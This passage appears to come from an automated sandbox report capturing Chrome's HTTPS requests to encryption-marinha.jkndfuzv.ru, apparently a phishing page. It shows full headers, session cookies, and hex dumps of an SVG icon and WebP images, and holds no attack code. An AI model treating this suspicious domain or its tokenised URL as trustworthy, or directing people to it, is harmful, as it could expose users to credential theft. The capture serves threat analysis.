                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:03 UTC1104INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:03 GMT
                                                                  Content-Type: image/svg+xml
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="rsvIvTvoLMZ03pS3MwX9LijbSo1tmpSLY8DjCu6chApJIUMh9R9qpcd198"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHBM7oAzgx7vMiuCaA1ZVdwiV1me%2BvfCoSJVWupH2VUH0jfuhvQ1oZANPdqO%2FJEadZjWI3w8QRAAOY%2BoHIgeegNKNTV8YAX5yhYMB7YeBS5cqjGJjuQiEK9cx1nA"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4920&min_rtt=4918&rtt_var=1849&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2378&delivery_rate=576634&cwnd=251&unsent_bytes=0&cid=2f80dc4fbd44357c&ts=130&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371493ffe42e3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=606&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2040&delivery_rate=1809169&cwnd=195&unsent_bytes=0&cid=1f628f663a2f81a7&ts=412&x=0"
                                                                  2025-03-14 11:31:03 UTC265INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                  Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                  2025-03-14 11:31:03 UTC10INData Raw: 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                  Data Ascii: /></svg>
                                                                  2025-03-14 11:31:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.449766104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:03 UTC1459OUTGET /ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS12206 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:03 UTC1066INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:03 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 25216
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS12206"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxl%2BCTiG0KT%2FtanJYIPl6ewAfD%2F0D0E3G6gUJ9P6YOnPfdSjwY5RaCYrWGZAPSQcDQiTnoNKRX0xQQ9533iCx%2FuYZ6vgNVOJ4rdaWFbO7AFlm941SW04cobeYBvp"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4874&min_rtt=4829&rtt_var=1843&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2369&delivery_rate=589770&cwnd=246&unsent_bytes=0&cid=e6f1de5ab440f78f&ts=100&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037149d9ec4390-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1703&rtt_var=651&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2031&delivery_rate=1664766&cwnd=231&unsent_bytes=0&cid=0b23dd229903965c&ts=382&x=0"
                                                                  2025-03-14 11:31:03 UTC303INData Raw: 52 49 46 46 78 62 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6f 08 00 ba 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFFxbWEBPVP8X0oICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 00 00 1c 00 73 00 52 00 47 00 42 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 a0 59 00 00 01 ff 27 24 48 f0 ff 78 6b 44 a4 ee e1 8f ff 6f 55 53 fa ff 5b d7 75 4d 07 03 c3 d0 43 77 49 a3 48 23 dd 48 a7 74 28 1d 0e 21 4a 8b 41 4a 23 20 a1 28 8d 84 d2 1d d2 dd
                                                                  Data Ascii: sRGBXYZ o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHY'$HxkDoUS[uMCwIH#Ht(!JAJ# (
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 8a d7 eb 7b 05 03 7b 53 b5 1f 1f 49 81 af 0b ba 84 a9 6d 13 e2 cd d2 52 20 65 de fe 3b 92 f5 e0 c9 bc fa 6e 20 a4 b9 fe 86 64 19 f0 ac a7 0b 98 ec cf 50 c4 73 fd bd 41 d4 ac 3d 76 24 a9 ee c1 bc 1a 26 10 35 67 c8 03 11 70 9e eb 17 f3 1e 14 d0 ba a6 14 08 9c f9 b3 83 76 75 85 ce 2c 03 02 5b da 5f 92 00 db ba 7c 99 88 fc 93 d7 14 03 a9 83 43 ee 28 29 71 47 7b 37 90 ba fe 29 01 de 14 72 f1 52 db c6 2e f1 a7 bc 20 b9 a9 c6 f2 28 d5 9c 1c 90 19 44 6f 78 82 1d 9e f5 74 e9 92 fd 19 72 df 57 12 c4 f7 ea 71 55 21 89 1b 3e 04 f9 5b 3c e0 86 f3 5d b9 98 f7 20 f3 eb 0d 40 89 a6 86 3b ed 6a 78 36 21 1b 28 d1 fb eb 38 66 d8 d6 85 cb e7 c8 fb cd 50 37 50 66 d1 79 51 f2 9d ee ec 0e ca cc bb 9e 59 58 76 97 2d f9 63 78 ed ce 03 4a cd 34 f4 81 68 f6 cd 1f 82 5a 5b be 60 85
                                                                  Data Ascii: {{SImR e;n dPsA=v$&5gpvu,[_|C()qG{7)rR. (DoxtrWqU!>[<] @;jx6!(8fP7PfyQYXv-cxJ4hZ[`
                                                                  2025-03-14 11:31:03 UTC244INData Raw: c8 38 a9 0d 18 49 ef 97 c4 b0 93 ee 99 aa cf 7b 88 b2 5f fe aa 58 1a ca 32 d4 c5 98 63 f3 ba 06 a7 07 99 4e 23 f9 b7 d9 74 a6 1f d2 ef 62 cc 72 d8 89 25 e5 50 d5 40 64 9c d8 02 8c e5 54 6a bf ea 5d 91 49 f7 50 85 97 c6 e7 4b 23 29 69 d3 86 77 de ff a5 57 91 f4 9e f6 c8 70 a6 c6 78 be 64 70 d7 64 c8 7a 23 f1 df 40 d1 35 92 18 25 34 01 83 99 d7 4a 2c d2 5d df b2 7c 7e 12 95 69 df df dd 27 2d 64 1a ea e7 d3 65 ad fd d2 73 b6 73 b8 a7 31 2d 90 63 79 43 b6 95 5a 75 45 e5 7e 81 7c e3 1a 80 e1 dc 4c 0c eb ea 5a a5 15 f1 a8 d6 a8 25 65 d3 3e 8e 68 08 22 26 ee 1d 5e 34 dd e6 15 07 f4 d7 97 e9 2c 7a 1a 31 ef 58 62 97 40 cd 96 43 c8 37 b6 2e 18 cf 4f a8 cd d1 32 af 1e a7 51 c5 47 3a ba a7 71 dc d4 93 7f 5f 1a 57 30 5d c6 cd c1 22 9f
                                                                  Data Ascii: 8I{_X2cN#tbr%P@dTj]IPK#)iwWpxdpdz#@5%4J,]|~i'-dess1-cyCZuE~|LZ%e>h"&^4,z1Xb@C7.O2QG:q_W0]"
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: be ac 64 31 dc 88 35 43 e2 fd 15 35 05 f9 46 d7 04 03 6a ba 41 ec 9e 86 05 4d 0d 43 55 3f 1d e5 9f a6 f1 50 5f 10 f1 f4 88 3c e9 2f 9e c8 b2 a0 be ac 61 31 da 88 2d 21 f6 c6 57 4d f5 ed 7c 62 3e 06 43 3a 84 18 96 d6 ad e0 39 b1 a8 f2 37 df e6 4c a7 41 b4 ff fd a9 7b 46 a8 27 c4 96 83 92 73 bd 44 b6 09 f5 c0 98 66 4d 26 36 46 af 8a fe 9c 84 aa 8f 9f 95 3d 9d 06 11 5f 7c 5b 38 c3 53 61 24 5e 47 49 96 83 c8 36 b9 19 18 d5 1d c4 76 ea 54 fe 5f 6c a8 83 b1 df 05 a5 d7 20 da f7 36 33 65 6c ea 43 ec 99 45 49 93 91 ad ad 13 18 d6 ce c4 de 5a b4 29 70 66 02 ea 62 cc 24 ef f4 1a 44 bc 3b cc 3b 23 d3 1a 62 df 83 8a eb d8 d8 38 fa 82 71 f5 89 a1 85 95 34 c9 27 e4 0d ea e4 d3 fe e6 74 1b c4 57 93 02 33 2e 3d 21 56 5e 45 39 5f 20 db 2f c0 c8 ae 25 36 4a 8b 4c 5d 9e a1
                                                                  Data Ascii: d15C5FjAMCU?P_</a1-!WM|b>C:97LA{F'sDfM&6F=_|[8Sa$^GI6vT_l 63elCEIZ)pfb$D;;#b8q4'tW3.=!V^E9_ /%6JL]
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 30 15 24 57 4c ff b1 37 cd c0 12 18 8b 18 db 09 11 13 b2 bf a3 3e ad aa 6a c8 12 c1 e1 79 90 b1 fb 83 d4 75 85 65 ba 87 82 bf 3d be f8 f3 7a 85 dc c1 a9 ee 79 6a f5 9f f5 d7 03 bb 64 78 c3 33 dd 07 df 14 cd b8 02 0b 10 31 0e 11 97 c2 3b ba d2 ca a7 86 1f 90 63 33 30 f6 73 49 45 28 ec 57 94 fa e6 8a de 25 4d 90 fa 3e b5 c6 ed 88 10 0b a7 a6 ff e0 55 ef 8c 2b 45 6c f8 6f 7b 89 77 7d 41 ca e1 a1 84 02 09 1c d6 81 c1 0f 21 65 55 57 0f 14 39 7a 4b ff 7c 40 d8 54 72 d0 ee 04 99 92 ca a6 85 c4 47 72 8d 53 04 2e c8 b8 02 5b de f1 27 bc 6b 2c a9 30 50 e2 3a 64 f8 2a 48 43 72 4c 3c 1a 1a 7e ee a7 4a 8a e8 41 0a 7d 54 55 34 5a a0 d8 f5 ad bd 80 be ef a7 2b 5f 0b 84 a7 2d 69 20 a3 80 af 5f be f2 f5 3f fb 66 c5 fe 17 b2 39 5a 64 5c a9 fe 8e da ff 31 83 d4 55 25 54 b2
                                                                  Data Ascii: 0$WL7>jyue=zyjdx31;c30sIE(W%M>U+Elo{w}A!eUW9zK|@TrGrS.['k,0P:d*HCrL<~JA}TU4Z+_-i _?f9Zd\1U%T
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: bc d1 6d 3e f0 d5 31 8f 62 0d fa 4e 5b b5 fd f8 cd 57 91 91 76 b4 45 46 86 de 3c b6 75 f9 e4 9e b5 82 4d 5a 96 b3 5a e7 b1 0b 36 1c b8 f4 34 32 32 01 31 3a 32 ec fe 99 dd 6b 66 0f 6d 56 d2 2b ad e8 0a a9 a9 72 79 be a4 d7 02 14 9e f3 37 e4 fa 95 60 31 a4 7a 29 a4 98 9d db 2a 50 f5 00 5e f3 e5 cb fa c9 b0 e5 a7 a3 31 55 13 af ac 1f df aa 90 91 83 5c 0f d9 61 65 c9 8a 75 fb 6e f7 63 4c c5 87 5b be 6a 9a 55 9f 02 9b 8e 5b 7f 35 19 9d 1f 77 6a 71 ff 4a 16 7d 72 af 3c 70 d1 d1 48 74 be e3 ce 86 71 8d b3 a4 01 fd 43 ea 47 b9 7a 22 f9 53 a0 6e f3 80 37 c8 f6 85 a7 5c 36 52 9d 14 b2 08 99 9f f6 54 16 2c e3 14 53 48 34 73 b9 81 ab 6f 21 d9 d7 7f 4e a8 eb 6b d4 a0 64 14 bb b5 42 59 3e 9a b0 23 0c 29 da 2f ce 69 e1 a3 3f c1 bd 57 de 74 20 c5 e8 5d 5f 56 36 e9 8f 77
                                                                  Data Ascii: m>1bN[WvEF<uMZZ64221:2kfmV+ry7`1z)*P^1U\aeuncL[jU[5wjqJ}r<pHtqCGz"Sn7\6RT,SH4so!NkdBY>#)/i?Wt ]_V6w
                                                                  2025-03-14 11:31:03 UTC79INData Raw: c1 fd 96 b3 4e f5 cb 04 92 77 7b 85 6a dc 9e cf 10 65 8e 64 75 8b 4d e1 a3 28 f7 f5 bc ea 69 fe 1c e5 8e 69 a4 9e 5c bb 50 f0 35 ee 52 1c 65 f4 83 0c d5 90 67 2c 10 36 25 93 0a 91 68 37 b9 e1 a0 d2 26 0f 50 e2 a6 12 85 92 fa 41 11 1d 90
                                                                  Data Ascii: Nw{jeduM(ii\P5Reg,6%h7&PA
                                                                  2025-03-14 11:31:03 UTC1290INData Raw: 73 08 e8 63 7b a7 bc 9e 55 1a 44 2f b2 0f 95 19 3b ca cd 00 c1 78 56 98 9f 87 a9 7f 0c 4a fe a8 a8 62 7c 97 a0 e8 c9 9f a9 a6 6d 38 8a be c7 5f 88 b5 8c ae c9 f0 35 93 7d 94 e0 05 a9 45 02 05 db a8 45 fa 29 24 d7 1f 28 f3 36 81 3c ec a4 42 14 f1 0b a7 d7 3e 1a 61 3a 98 22 db ce 4f 3d 40 74 d3 a0 58 54 e9 a9 a2 06 c8 ef 15 ab 3e 2c 72 ec 42 e1 5f 96 51 4a d5 3b 28 bc 63 88 52 fc 57 a1 f4 ff 04 c8 f0 39 23 cc 27 c2 51 26 5f 92 ba 42 6a 97 40 e3 91 fa 0c 50 a6 f9 f3 b7 28 b4 35 97 3c 85 91 74 1f 35 98 9e 73 9a 08 3a 99 fb c9 fb dd 1d 9f 07 84 cf fd 17 2a 36 76 90 c9 f0 c0 58 56 eb 39 d4 7a 8e e2 3f 2b a8 90 cf 93 50 7c c7 00 85 94 bc 89 f2 9f f0 13 a1 2c a7 01 12 f8 25 33 29 47 6a 37 a9 6b f2 98 ee 52 4b cc a9 8c 0f 4e a1 dc 23 e4 a9 47 ab 91 1a 3e 40 c6 d1
                                                                  Data Ascii: sc{UD/;xVJb|m8_5}EE)$(6<B>a:"O=@tXT>,rB_QJ;(cRW9#'Q&_Bj@P(5<t5s:*6vXV9z?+P|,%3)Gj7kRKN#G>@
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 07 41 66 d1 6a a0 84 af f8 5c 03 a3 3d 00 35 f4 59 7e 63 02 77 f9 44 a5 da 04 34 14 93 d0 50 94 8c 46 9d 2b cf 28 d6 93 51 6b e4 39 9d c3 6c 5a 5d e4 68 89 c4 17 80 c8 be 3f 5a 51 d5 b7 05 39 4a 2b 58 09 bf f3 59 60 b4 ea 24 eb 08 5e f4 31 26 2b f9 60 50 2a 35 b6 1b 8a a6 76 43 e1 7f 03 b5 0e 1e f2 c1 06 8c 16 30 a9 ce a1 1f ad 39 72 fc 4c ad 8a 48 cd 1f a1 c2 4b 88 61 89 21 15 6d 52 c2 35 3e 3d 0c 56 fe d7 a8 a7 eb 4d 86 64 10 a3 0a a9 93 eb 35 1a 89 9c af d1 50 ac 42 cd 9b cb 68 0e a3 5b 3c c2 2d 1c 6a d0 3a 2e 86 f9 05 b1 eb 20 70 ae 35 a8 f4 10 31 ca 20 e9 7f 40 85 a6 38 3e 25 8d 95 d7 59 d4 d5 10 43 52 95 51 cb 54 31 ed 44 23 61 da 89 86 a2 35 ea 5e 1d 46 37 f9 04 23 cf 75 c0 31 2b ad 38 37 29 3e 42 e2 5f ca 63 19 12 85 6a 3f 21 46 4f 5a ab 95 90 1d
                                                                  Data Ascii: Afj\=5Y~cwD4PF+(Qk9lZ]h?ZQ9J+XY`$^1&+`P*5vC09rLHKa!mR5>=VMd5PBh[<-j:. p51 @8>%YCRQT1D#a5^F7#u1+87)>B_cj?!FOZ


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.449767104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:03 UTC1464OUTGET /qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef236 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:03 UTC1068INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:03 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 9648
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef236"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghs8UonxxvhfvswJnc%2FbC398EXgm8aSaEVEnosy84AWXUtutlH9kB%2BMSgbZJTbe%2F9SYk7k3HXw7MWmbchSVKBFbX1GnY8v91GRo0DIZTAlEgapm2ikM8VePVMIUy"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4904&min_rtt=4848&rtt_var=1858&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2373&delivery_rate=587458&cwnd=251&unsent_bytes=0&cid=96a9b36dc8dc4cfa&ts=116&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037149ef863ee0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2407&min_rtt=2403&rtt_var=910&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2036&delivery_rate=1197703&cwnd=120&unsent_bytes=0&cid=c74138849e7f30e1&ts=401&x=0"
                                                                  2025-03-14 11:31:03 UTC301INData Raw: 52 49 46 46 a8 25 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 f9 01 00 2e 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFF%WEBPVP8X0.ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
